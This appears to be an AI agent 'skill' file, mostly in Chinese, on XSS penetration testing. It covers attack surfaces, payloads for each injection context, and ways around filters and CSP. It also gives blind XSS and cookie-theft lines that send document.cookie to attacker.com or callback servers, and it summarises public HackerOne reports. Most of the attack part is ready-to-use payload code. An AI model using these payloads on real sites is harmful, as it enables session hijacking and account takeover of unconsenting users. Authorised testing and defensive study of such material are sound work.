XSS Penetration Testing Patterns
当对 Web 应用进行 XSS 渗透测试时加载此 Skill。覆盖 Stored、Reflected、DOM-based XSS 的攻击手法。
Attack Surface Discovery
高风险输入点:
- 搜索框、评论/留言功能、用户资料编辑(显示名、简介)
- URL 参数直接反射到页面(
?message=, ?error=, ?callback=)
- 富文本编辑器、Markdown 渲染器
- 文件上传(SVG、HTML 文件)
- API 响应被前端渲染(JSON 中的 HTML 字段)
- 第三方集成回调(OAuth redirect_uri、webhook)
DOM-based XSS 入口:
location.hash、location.search 被 document.write() 或 innerHTML 使用postMessage 处理器缺少来源验证- 客户端模板引擎(AngularJS
{{ }}、Vue v-html)
识别信号:
- 输入值在响应 HTML 中原样出现(无编码)
Content-Type: text/html 的 API 响应- 缺少
Content-Security-Policy 头
- 反射参数出现在 HTML 属性、JavaScript 代码块、URL 中
Exploitation Techniques
按上下文构造 Payload:
<!-- HTML 上下文 -->
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<details open ontoggle=alert(1)>
<!-- 属性上下文 -->
" onfocus=alert(1) autofocus="
' onmouseover='alert(1)
<!-- JavaScript 上下文 -->
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
<!-- URL 上下文 -->
javascript:alert(1)
data:text/html,<script>alert(1)</script>
Stored XSS 利用链:
- 在用户资料、文章、评论中注入 payload
- 其他用户/管理员访问时触发
- 窃取 session cookie:
fetch('https://attacker.com/steal?c='+document.cookie)
- 利用管理员 session 进行后台操作
过滤绕过技巧:
- 大小写混合:
<ScRiPt>alert(1)</ScRiPt>
- 事件处理器替代:
onerror, onload, onfocus, ontoggle, onanimationend
- 编码绕过:HTML 实体
alert(1)、Unicode \u0061lert(1)
- 标签变体:
<svg>, <math>, <details>, <marquee>
- 无括号执行:
.constructor.constructor`('alert(1)')
- Reader Mode / 特殊渲染模式注入(如浏览器 Reader Mode 中的 nonce 利用)
- Mutation XSS (mXSS):利用浏览器 DOM 解析与序列化的差异,payload 在 innerHTML 赋值后变异为可执行脚本
- Markdown 注入:
[link](javascript:alert(1))、)
Blind XSS:
<!-- 注入到支持工单、反馈表单、日志查看器等后台渲染的位置 -->
"><script src=https://your-callback-server/hook.js></script>
<img src=x onerror="fetch('https://callback.server/'+document.cookie)">
- 使用 XSS Hunter 或自建 callback 服务器检测触发
- 常见注入点:User-Agent、Referer、表单字段在管理后台被渲染
CSP 绕过:
script-src 'unsafe-inline':直接执行内联脚本- JSONP 端点:
<script src="trusted.com/jsonp?callback=alert">
- Base URI 注入:
<base href="https://attacker.com/">
script-src 白名单中的 CDN 利用
Detection Checklist
Impact Assessment
漏洞利用可达到的效果:
- Session 劫持:窃取 cookie 实现账户接管
- 钓鱼攻击:注入虚假登录表单窃取凭证
- 恶意操作:以受害者身份执行敏感操作(转账、修改设置)
- 数据窃取:读取页面内容、API 令牌、个人信息
- 蠕虫传播:Stored XSS 可构造自传播蠕虫
严重度判断:
- Critical:Stored XSS 影响所有用户/管理员、可窃取 session、无需用户交互
- High:Reflected XSS 在高价值页面、可绕过 CSP 执行任意 JS
- Medium:Self-XSS、需要特定用户交互、CSP 限制了利用范围
Real-World Cases
以下案例来自 HackerOne 公开披露的真实漏洞报告,展示了该类漏洞在实际目标中的表现形式。
Case 1: Brave Software — New XSS vector in ReaderMode with %READER-TITLE-NONCE%
- 严重度: Critical | CWE: Cross-site Scripting (XSS) - Generic
- 摘要: A new XSS vulnerability was discovered in Brave iOS 1.31.1 and higher, which allowed attackers to execute malicious scripts on ReaderMode pages. The vulnerability was caused by a relaxation of the CSP...
- 报告: https://hackerone.com/reports/1436142
Case 2: Khan Academy — XSS on using the legacy "Graphie To Png" API
- 严重度: Critical | CWE: Cross-site Scripting (XSS) - DOM
- 摘要: The legacy "Graphie To Png" API was vulnerable to exploitation. An attacker could upload malicious graphies that included harmful SVG and JSON data. The SVG contained an
onload attribute that execut...
- 报告: https://hackerone.com/reports/2846011
Case 3: LinkedIn — Stored XSS on LinkedIn App via iframe tag in Article
- 严重度: Critical | CWE: Cross-site Scripting (XSS) - Stored
- 摘要: A stored XSS vulnerability was reported in the LinkedIn Article feature, where a malicious JavaScript payload could be embedded in the URL field of an iframe. When such an article was published and ac...
- 报告: https://hackerone.com/reports/2212950
Case 5: Rocket.Chat — XSS via /api/v1/chat.postMessage
- 严重度: Critical | CWE: Cross-site Scripting (XSS) - Stored
- 摘要: The victim could craft a custom message using the REST API that, once seen by the observer, executed arbitrary code in the context of the client user. The vulnerability was present in the attachment f...
- 报告: https://hackerone.com/reports/219957
Case 6: 8x8 — Stored xss at https://█.8x8.com/api/█/ID
- 严重度: High | CWE: Cross-site Scripting (XSS) - Stored
- 摘要: A vulnerability was reported where stored data could be modified to introduce malicious JavaScript that would execute in a victim's browser when the data was retrieved. The issue was isolated to a ran...
- 报告: https://hackerone.com/reports/2078490
Case 7: AWS VDP — XSS on Amazon Aquisition: elemental
- 严重度: High | CWE: Cross-site Scripting (XSS) - Reflected
- 摘要: The XSS vulnerability on Amazon's acquisition of Elemental was identified and addressed. The summary provided a brief overview of the issue.
- 报告: https://hackerone.com/reports/3205667
Case 8: Acronis — Potential XSS Vulnerability in Acronis Login Callback URL
- 严重度: High | CWE: Cross-site Scripting (XSS) - Generic
- 摘要: The Acronis login callback URL was found to be vulnerable to cross-site scripting (XSS) attacks. The redirectUrl parameter in the URL was not properly sanitized, allowing an attacker to inject arbitra...
- 报告: https://hackerone.com/reports/2611305
Case 9: Acronis — Blind XSS on admin.acronis.com via delete account form on account.acronis.com
- 严重度: High | CWE: Cross-site Scripting (XSS) - Stored
- 摘要: Blind XSS vulnerability was discovered on admin.acronis.com. The vulnerability could be triggered by sending a payload during the account deletion process on account.acronis.com.
- 报告: https://hackerone.com/reports/666040
Case 10: Autodesk — Stored XSS in AREA tutorials
- 严重度: High | CWE: Cross-site Scripting (XSS) - Stored
- 摘要: A stored cross-site scripting (XSS) vulnerability was discovered in the AREA tutorials feature. The vulnerability could have allowed an attacker to inject malicious JavaScript code when publishing a t...
- 报告: https://hackerone.com/reports/3008066